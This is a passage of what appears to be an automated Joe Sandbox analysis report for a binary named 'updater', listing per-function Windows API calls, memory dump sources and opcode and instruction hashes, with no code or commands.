                                  • Instruction ID: 1cf3f8117fcc7398d0d63f0b42422320903e437b1188a598a25cd0166646a495
                                  • Opcode Fuzzy Hash: a4114137676e494545ba4f8b5eb979bdd9c807181b455980f06885c00714c631
                                  • Instruction Fuzzy Hash: 96218E7260020AABEF24DF58D881BEEB7BCEB94708F11412EF902A71D5D7B09948CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 013C79E0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: f01b0073652bf58f9423f6c07ed3d1a4818311a201e695573e754f70cb4c826e
                                  • Instruction ID: 168ad1953c300266bf0765de4b39699b4e40de778465f32186179454a2c2ccf8
                                  • Opcode Fuzzy Hash: f01b0073652bf58f9423f6c07ed3d1a4818311a201e695573e754f70cb4c826e
                                  • Instruction Fuzzy Hash: 82018F75604B44AFF322CB7C8844BB6BAECEB14A14F00493EFAA6D3351E7B09D409B10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _free.LIBCMT ref: 01430E86
                                    • Part of subcall function 0143255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E
                                  • RtlReAllocateHeap.NTDLL(00000000,00000000,013C2742,?,00000000,?,01422F1A,00000000,?,?,?,00000000,?,013DF38B), ref: 01430EC2
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap$_free
                                  • String ID:
                                  • API String ID: 1482568997-0
                                  • Opcode ID: 778808b725e9a01d383cb788a8b203dfa61a773114d9627bdd457500ca5a6dd8
                                  • Instruction ID: 92163572d07e9e89d5c042db9931854f0d00012c474da09dffb196b28a775927
                                  • Opcode Fuzzy Hash: 778808b725e9a01d383cb788a8b203dfa61a773114d9627bdd457500ca5a6dd8
                                  • Instruction Fuzzy Hash: 3FF09C32301216669B312A3B9C01F5F77589FD9971B55031BF914573B0DB34C542C5B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 01406094
                                  • GetLastError.KERNEL32 ref: 014060A7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  • Opcode ID: 3a73f421243442d540818bd6fc284d428adecd58b942c22681a63c3d27c648e6
                                  • Instruction ID: 457b5bf2bf3b3ebf2f89a97b14962960efb59255b2ad5f6af9462bb21bc1fd4e
                                  • Opcode Fuzzy Hash: 3a73f421243442d540818bd6fc284d428adecd58b942c22681a63c3d27c648e6
                                  • Instruction Fuzzy Hash: 36F0F670B40118ABDB13CA5DC980ADF7ABE9B54258F108136E902A63E5DB71D8628390
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: 82a41ba6e35c890217f2af1e282365213f63c4f4c66e1d1c217bd7941a00bf2c
                                  • Instruction ID: b7d1547945e22fb167251a0c46de362c1345a0140f486fef6c5a74b8d353cd5f
                                  • Opcode Fuzzy Hash: 82a41ba6e35c890217f2af1e282365213f63c4f4c66e1d1c217bd7941a00bf2c
                                  • Instruction Fuzzy Hash: 50E06522A0653245EB26667F7C0076A55898FE5239B55032BF420861F4DBB445C24196
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013C2F8F
                                    • Part of subcall function 014060E6: FindNextFileW.KERNEL32(?,?,?,013C2C78,?,?,?,?,?,?,?,?,00000000), ref: 014060EF
                                  • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013C2FA1
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
                                  • String ID:
                                  • API String ID: 478157137-0
                                  • Opcode ID: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
                                  • Instruction ID: d502ebe5a879e7cbb279afe02c4737f530d8b3c5e66051e0bb4b342c2b403c84
                                  • Opcode Fuzzy Hash: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
                                  • Instruction Fuzzy Hash: 03E0863110410F7AEF02AA17DD0086B7B7AAFF1A58741803DFC0696661DB32EC7597A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CopyFileW.KERNEL32 ref: 01405D77
                                  • GetLastError.KERNEL32(?,?,?,01406070,?,?,00000000,CE5F1F10), ref: 01405D8D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CopyErrorFileLast
                                  • String ID:
                                  • API String ID: 374144340-0
                                  • Opcode ID: 9c502fc30ef1ba516502cd69b3ca2049dcbfd564a922c93a30f1d59b5b34dffa
                                  • Instruction ID: 5cb6351d6e94ad46e15636813b471d967b84dd4dcec89a1734aaf6a54078b3a1
                                  • Opcode Fuzzy Hash: 9c502fc30ef1ba516502cd69b3ca2049dcbfd564a922c93a30f1d59b5b34dffa
                                  • Instruction Fuzzy Hash: 20E04F34504149FFDB028BA6D808F6E7FA99F15245F08C066B844852A4DA74D5529B70
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01421169
                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01421174
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                  • String ID:
                                  • API String ID: 1660781231-0
                                  • Opcode ID: fed47b1b3cc60b90d7949dab8b19b4f5ee74f104f189f04560ad071b0633872a
                                  • Instruction ID: b5cc17e27ebb2d5c0e48ea268da3cf17b6556d9cdd69fd71a14e308ac3af6444
                                  • Opcode Fuzzy Hash: fed47b1b3cc60b90d7949dab8b19b4f5ee74f104f189f04560ad071b0633872a
                                  • Instruction Fuzzy Hash: 14D0A9B1288673140C2422BA680087B2295593AEF43F0038FC42089AF1EBB280C261A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013E08C1: EnterCriticalSection.KERNEL32(?,00000000,?,013E04FE,01464914,013E0630,00000007,?,?,?,?,013E0374,?), ref: 013E08C9
                                    • Part of subcall function 013E08C1: GetCurrentThreadId.KERNEL32(?,013E04FE,01464914,013E0630,00000007,?,?,?,?,013E0374,?), ref: 013E08CF
                                  • _strlen.LIBCMT ref: 013FC011
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalCurrentEnterSectionThread_strlen
                                  • String ID:
                                  • API String ID: 1501162294-0
                                  • Opcode ID: 0c377826beeb036d6d98c981d553b537705ac4705d6a00265561c07a53ccbe31
                                  • Instruction ID: caa8bc585ef0eb8d469ac693ce1f75ad6dd3f0954ecbe05ffae1b35e6128efea
                                  • Opcode Fuzzy Hash: 0c377826beeb036d6d98c981d553b537705ac4705d6a00265561c07a53ccbe31
                                  • Instruction Fuzzy Hash: 1471E6B190031AEBDF15DF6DC880ABEBBB4EF15228F10402DEA14AB295D735DA45CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID:
                                  • API String ID: 2638373210-0
                                  • Opcode ID: 2c9f057616eb082071618832780a5865458cac9570b2e72292cf114dfa45c5f3
                                  • Instruction ID: 9fc3f9f5935c0b0bfaa15c571fe061e727b87c9f9c707f0297c2f1007d6f14e7
                                  • Opcode Fuzzy Hash: 2c9f057616eb082071618832780a5865458cac9570b2e72292cf114dfa45c5f3
                                  • Instruction Fuzzy Hash: C421077290530AEFCB10EFADD880AEEBBB8EF64A04F50046FE405A7181D7705B48CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Deallocate
                                  • String ID:
                                  • API String ID: 1075933841-0
                                  • Opcode ID: 06d55f0090a365e7cf1a2ee48323d961df7079bd84090b7898b360519a70f18c
                                  • Instruction ID: 70f1a3f1e064889e22bce15dc7ef57efd1de93da6443c3f56981cd5667a17d38
                                  • Opcode Fuzzy Hash: 06d55f0090a365e7cf1a2ee48323d961df7079bd84090b7898b360519a70f18c
                                  • Instruction Fuzzy Hash: 6811D2B5900345ABCB15DF69988099EBBBEEF95208B2444ADE8159B302D631DA17CBB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f67fc0833f2f13ac8401f326040f5c089a515492e9c3aaa48078c7d47b2aecd7
                                  • Instruction ID: 056c2137d38208d3833f98ca525b59982b0465d981bb94da12c6cbe9831cd1ad
                                  • Opcode Fuzzy Hash: f67fc0833f2f13ac8401f326040f5c089a515492e9c3aaa48078c7d47b2aecd7
                                  • Instruction Fuzzy Hash: FA01F5373102216FAF26CE6DEC4095B37AAAB842247D44222FA04DB2B8DA719885C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 013C7BB4
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 72e3e38f9beaf686998eaae9f885e3e0044270fb66345c20daff7b025c5baa2f
                                  • Instruction ID: b4fcd7b7bbb5a8922e7ee6b6df0424f383ead311e042662307031d4e12da0751
                                  • Opcode Fuzzy Hash: 72e3e38f9beaf686998eaae9f885e3e0044270fb66345c20daff7b025c5baa2f
                                  • Instruction Fuzzy Hash: 95115B31600515BFEB059F29C804A9ABBB9FF14B64F008119ED6997610DB30FD60DFE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::exception::exception.LIBCMT ref: 013C128D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception
                                  • String ID:
                                  • API String ID: 2807920213-0
                                  • Opcode ID: 5111b80350756194ba4e98a0db365e94a0674f5821f07a26e42e8d2193d53873
                                  • Instruction ID: 7155f064ab0cba46efdcea5d90952d74e2f1bdaea229db6b1b45391692999834
                                  • Opcode Fuzzy Hash: 5111b80350756194ba4e98a0db365e94a0674f5821f07a26e42e8d2193d53873
                                  • Instruction Fuzzy Hash: DDF07D7240022D67C714BFAAEC04C9E7BAC9E20A58780056EF91C87651EB31ED4583D4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __wsopen_s
                                  • String ID:
                                  • API String ID: 3347428461-0
                                  • Opcode ID: 24c6a91bfff861d1c888fbf716f4d969e8e5f145bbe914a5df2ac1c2d60829cc
                                  • Instruction ID: 0abf333d15ee3075d1bcea84184132e6e211e0ee5f988d7b62da36c1ed62000b
                                  • Opcode Fuzzy Hash: 24c6a91bfff861d1c888fbf716f4d969e8e5f145bbe914a5df2ac1c2d60829cc
                                  • Instruction Fuzzy Hash: B2113971A0420AAFCF05DF58E94599F7BF9EF88304F15406AF809EB361D630EA15CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 014300C6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0143063D,00000001,00000364,00000005,000000FF,?,?,01423CA9,01430149,?,?,0142DA9C), ref: 01430107
                                  • _free.LIBCMT ref: 01438E57
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: deb1c0a4bcfdfdda9140dc86cca0d54468f7f47de27033a236988258eda4d6b1
                                  • Instruction ID: 6606779104dee256078dc4247f7c6bdabd50f5699781284c0292f48a1432dded
                                  • Opcode Fuzzy Hash: deb1c0a4bcfdfdda9140dc86cca0d54468f7f47de27033a236988258eda4d6b1
                                  • Instruction Fuzzy Hash: 2A012672600317ABC3318F59D88199AFB98EB987B0F00072EF555B76D0E770A8118BB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __alldvrm
                                  • String ID:
                                  • API String ID: 65215352-0
                                  • Opcode ID: 0460f07f0d12403b60dde8756b98344bfb9af85e1b97c0701680bafdc2b72f66
                                  • Instruction ID: 8283a509bfb4c00cf7f005c3302b7cec1b1178d38f66c020559f8c6ca49b2f86
                                  • Opcode Fuzzy Hash: 0460f07f0d12403b60dde8756b98344bfb9af85e1b97c0701680bafdc2b72f66
                                  • Instruction Fuzzy Hash: 1501B572810214BFEB14DF65C845BEEB7E8FB61229F50855EE502AB250D674BA80CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ca8e9e532a719df361b6c9cb492d982898333f57b032a82f79c94fe4b91144b
                                  • Instruction ID: ad9378257e0604a498cbe46a82aa4dfbf3804e785783c72d21e05e8cf16dce4e
                                  • Opcode Fuzzy Hash: 7ca8e9e532a719df361b6c9cb492d982898333f57b032a82f79c94fe4b91144b
                                  • Instruction Fuzzy Hash: 76F02D325006215AEA217E3BDC00B6B36B96FFD730F64071BE864932F0CB38D446C591
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: 5c2e12cd716acd2ee769000e0b8b80a9b3a91afc9e7156e1fe6f41a9e9f94f89
                                  • Instruction ID: 355bebd92dadb10cb031ac9bace20bb6cd60301ffdf20396c79566263c968cdc
                                  • Opcode Fuzzy Hash: 5c2e12cd716acd2ee769000e0b8b80a9b3a91afc9e7156e1fe6f41a9e9f94f89
                                  • Instruction Fuzzy Hash: 0701E172C00159AFDF01AFE98C019EE7FB5AB6C210F144566EA64F21A0E6318A619B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0143063D,00000001,00000364,00000005,000000FF,?,?,01423CA9,01430149,?,?,0142DA9C), ref: 01430107
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 7533c4e3e399c8a29c4595027c52037eb6a2db441b8a9d3a3a394da9b969e6b7
                                  • Instruction ID: 3d3ac95e93369f2b82559e769635f104aa2467bfefe7459e96a067566ee14098
                                  • Opcode Fuzzy Hash: 7533c4e3e399c8a29c4595027c52037eb6a2db441b8a9d3a3a394da9b969e6b7
                                  • Instruction Fuzzy Hash: 12F0243260122466AF351A3AAC10B5BBB689FD9670B088217F914A72F5CA30D44282E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::exception::exception.LIBCMT ref: 013C128D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception
                                  • String ID:
                                  • API String ID: 2807920213-0
                                  • Opcode ID: 7ce0ff713a16d39ae8c3fa38efda021c20983d459cd13500aa01237c12638d10
                                  • Instruction ID: 56160304bd6855bb00d763b69de86e56a8929c4053b1c0da09ad5052865804d9
                                  • Opcode Fuzzy Hash: 7ce0ff713a16d39ae8c3fa38efda021c20983d459cd13500aa01237c12638d10
                                  • Instruction Fuzzy Hash: 45F0E9B580030EB7CB147AEEEC0889A7F5C8E21AB4750453BFE18969B0EB71D995D6D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013C2BAE
                                    • Part of subcall function 014060E6: FindNextFileW.KERNEL32(?,?,?,013C2C78,?,?,?,?,?,?,?,?,00000000), ref: 014060EF
